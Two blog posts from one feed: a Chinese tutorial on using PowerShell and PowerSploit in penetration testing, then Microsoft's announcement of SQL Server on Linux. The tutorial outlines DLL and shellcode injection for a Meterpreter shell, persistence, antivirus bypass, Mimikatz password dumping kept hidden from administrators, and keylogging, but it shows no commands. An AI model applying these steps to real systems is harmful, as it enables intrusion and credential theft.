Powershell是Microsoft Windows命令列shell程式和腳本環境，它提供了令人難以置信的靈活性和功能來管理Windows系統，現在Windows系統上基本上都有它的存在。正因為它的強大，才能被我們所利用，幫助我們進行滲透測試。

Powershell的優秀之處​

1. 代碼運行在記憶體中可以不去接觸磁片

2. 從另一個系統中下載代碼並執行

3. 很多安全產品並不能監測到powershell的活動

4. cmd.exe通常被阻止運行，但是powershell不會

各個Windows下powershell版本

Powershell運行選項

以下介紹了滲透測試過程中我們經常要使用到的powershell運行選項

Powershell腳本預設情況下無法在cmd下或按兩下執行，這時我們就可以使用這個選項繞過。

PowerSploit

PowerSploit是GitHub上面的一個安全項目，上面有很多powershell攻擊腳本，它們主要被用來滲透中的資訊偵察、許可權提升、許可權維持。

項目位址：https://github.com/PowerShellMafia/PowerSploit

一、代碼執行（CodeExecution）

1. Invoke-DllInjection 

2. Invoke-ReflectivePEInjection

3. Invoke-Shellcode

4. Invoke-WmiCommand

二、脚本修改（ScriptModification）

1. Out-EncodedCommand

2. Out-CompressedDll

3. Out-EncryptedScript

4. Remove-Comments

三、权限维持（Persistence）

1. New-UserPersistenceOption

2. New-ElevatedPersistenceOption

3. Add-Persistence

4. Install-SSP

5. Get-SecurityPackages

四、繞過防毒軟體（AntivirusBypass）

Find-AVSignature

五、信息收集（Exfiltration）

這個資料夾主要是收集目標主機上的資訊。

六、信息侦察（Recon）

這個資料夾主要是以目標主機為跳板進行內網主機偵察。

搭建PowerSploit腳本伺服器​

1. 下載PowerSploit到伺服器

2. 啟動Apache

3. 查看是否成功搭建

實際運用

由於篇幅問題，我們不可能針對每一個腳本都進行詳細的介紹，所以這裡我們來介紹一下實戰中最常用到的腳本。

IEX遠端下載腳本執行：

取得Shell：

1.  Invoke-DllInjection

將DLL檔注入到當前進程中

我們首先來生成一個DLL反彈碼

在目的機上保存msf.dll到本地

我們下載Invoke-DllInjection腳本

運行一個隱藏進程並注入DLL反彈木馬

可以看見Meterpreter會話成功建立了

2. Invoke-Shellcode

在當前進程中注入Shellcode

Powershell調用Windows API非常方便，所以也可以直接來執行Shellcode。PowerSploit也提供了一些Shellcode，看下圖：

擴大成果–內網端口掃描

1. 我們先下載Invoke-Portscan

2. 结果

獲取主機密碼

為了不讓管理員發現，我們不能再目的機上添加任何帳戶，這時候我們就需要來獲取管理員密碼來維持訪問。這裡我們就需要使用到腳本Invoke-Mimikatz，注意需要管理員許可權。

1. 下載腳本

2. dump密碼

再來一個大殺器-鍵盤記錄

這樣它就進行鍵盤記錄，不僅有鍵盤輸入記錄還有滑鼠輸入記錄，而且還有很詳細的時間，實戰使用的時候，我們就要在放入後臺運行。

漏洞探測-攻擊進行時​

下載腳本：

Invoke-AllChecks：輸出可識別的漏洞

自学指南-Get Help

腳本很多，很難一一介紹，剩下就要自己來嘗試了，但是網上基本上找不到使用教程，所以就需要來獲取説明資訊，來説明自己學習。

比如Invoke-DllInjection

下載腳本：

獲取説明資訊：

查看事例：

查看詳細資訊：

結語

Powershell實在是太強大了，可以說是內網滲透利器，繼續深入研究，下一篇文章我們就不再是使用別人的腳本了，本篇文章的作用主要還是在於引導，大家還是要多用多練，才能在實踐中靈活的運用。

文章來源: http://bobao.360.cn/learning/detail/3104.html

圖片來源: https://pixabay.com/

The post 【技術分享】滲透利器之Powershell first appeared on 捕夢網 Blog.

從封閉心態的Microsoft走向擁抱世界的開放態度

從改變產品的布局即可一窺端倪

Azure一推出就支援Linux系統

一些產品像是Office365可安裝在iOS及Andriod等行動平台

微軟正在逐漸改變:)

It’s been an incredible year for the data business at Microsoft and an incredible year for data across the industry. This Thursday at our Data Driven event in New York, we will kick off a wave of launch activities for SQL Server 2016 with general availability later this year. This is the most significant release of SQL Server that we have ever done, and brings with it some fantastic new capabilities. SQL Server 2016 delivers:

• Groundbreaking security encryption capabilities that enable data to always be encrypted at rest, in motion and in-memory to deliver maximum security protection
• In-memory database support for every workload with performance increases up to 30-100x
• Incredible Data Warehousing performance with the #1, #2 and #3 TPC-H 10 Terabyte benchmarks for non-clustered performance, and as of March 7, the #1 SAP SD Two-Tier performance benchmark on Windows¹
• Business Intelligence for every employee on every device – including new mobile BI support for iOS, Android and Windows Phone devices
• Advanced analytics using our new R support that enables customers to do real-time predictive analytics on both operational and analytic data
• Unique cloud capabilities that enable customers to deploy hybrid architectures that partition data workloads across on-premises and cloud based systems to save costs and increase agility

These improvements, and many more, are all built into SQL Server and bring you not just a new database but a complete platform for data management, business analytics and intelligent apps – one that can be used in a consistent way across both on-premises and the cloud. In fact, over the last year we’ve been using the SQL Server 2016 code-base to run in production more than 1.4 million SQL Databases in the cloud using our Azure SQL Database as a Service offering, and this real-world experience has made SQL Server 2016 an incredibly robust and battle-hardened data platform.

Gartner recently named Microsoft as leading the industry in their Magic Quadrant for Operational Database Management Systems in both execution and vision. We’re also a leader in Gartner’s Magic Quadrant for Data Warehouse and Data Management Solutions for Analytics, and Magic Quadrant for Business Intelligence and Analytics Platforms, as well as leading in vision in the Magic Quadrant for Advanced Analytics Platforms.

Extending SQL Server to Also Now Run on Linux

Today I’m excited to announce our plans to bring SQL Server to Linux as well. This will enable SQL Server to deliver a consistent data platform across Windows Server and Linux, as well as on-premises and cloud. We are bringing the core relational database capabilities to preview today, and are targeting availability in mid-2017.

SQL Server on Linux will provide customers with even more flexibility in their data solution. One with mission-critical performance, industry-leading TCO, best-in-class security, and hybrid cloud innovations – like Stretch Database which lets customers access their data on-premises and in the cloud whenever they want at low cost – all built in.

“This is an enormously important decision for Microsoft, allowing it to offer its well-known and trusted database to an expanded set of customers”, said Al Gillen, group vice president, enterprise infrastructure, at IDC. “By taking this key product to Linux Microsoft is proving its commitment to being a cross platform solution provider. This gives customers choice and reduces the concerns for lock-in. We would expect this will also accelerate the overall adoption of SQL Server.”

“SQL Server’s proven enterprise experience and capabilities offer a valuable asset to enterprise Linux customers around the world,” said Paul Cormier, President, Products and Technologies, Red Hat. “We believe our customers will welcome this news and are happy to see Microsoft further increasing its investment in Linux. As we build upon our deep hybrid cloud partnership, spanning not only Linux, but also middleware, and PaaS, we’re excited to now extend that collaboration to SQL Server on Red Hat Enterprise Linux, bringing enterprise customers increased database choice.”

“We are delighted to be working with Microsoft as it brings SQL Server to Linux,” said Mark Shuttleworth, founder of Canonical. “Customers are already taking advantage of Azure Data Lake services on Ubuntu, and now developers will be able to build modern applications that utilize SQL Server’s enterprise capabilities.”

Bringing SQL Server to Linux is another way we are making our products and new innovations more accessible to a broader set of users and meeting them where they are. Just last week, we announced our agreement to acquire Xamarin. Recently, we alsoannounced Microsoft R Server , our technologies based on our acquisition of Revolution Analytics, with support for Hadoop and Teradata.

The private preview of SQL Server on Linux is available starting today and we look forward to working with the community, our customers and our partners to bring it to market.

Please join me Satya Nadella, Joseph Sirosh and Judson Althoff at our Data Driven event on Thursday to hear more about this news and how Microsoft is helping customers transform their business using data.

Thanks,
Scott

To find out more about SQL Server on Linux, you can sign up to get regular updates and provide input to the team.

1 Benchmark Certification #2016002: Two-tier configured SAP SD Standard Application Benchmark. Using SAP ERP 6.0 Enhancement Package 5, achieving the results of 100000 SD benchmark users using HPE Integrity Superdome X, 16 processors/288 cores/576 threads Intel E7-8890 v3 with 4096GB of main memory. Operating System: Windows Server 2012R2 with SQL Server 2014 Enterprise Edition as DBMS. For more details see: http://www.sap.com/benchmark.

[1] Gartner “Magic Quadrant for Operational Database Management Systems,” by Donald Feinberg , Merv Adrian , Nick Heudecker, October 2015
[2] Gartner “Magic Quadrant for Data Warehouse and Data Management Solutions for Analytics,” by Roxane Edjlali and Mark Beyer, Feb 2016
[3] Gartner “Magic Quadrant for Business Intelligence and Analytics Platforms,” by Josh Parenteau, Rita L. Sallam,  Cindi Howson  Joao Tapadinhas, Kurt Schlegel, Thomas W. Oestreich February 2016
[4] Gartner “Magic Quadrant for Advanced Analytics Platforms,” by Lisa Kart, Gareth Herschel, Alexander Linden, Jim Hare, February 2016

The above graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Microsoft. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

文章來源:https://blogs.microsoft.com/blog/2016/03/07/announcing-sql-server-on-linux/

圖片來源:https://pixabay.com/

The post Announcing SQL Server on Linux first appeared on 捕夢網 Blog.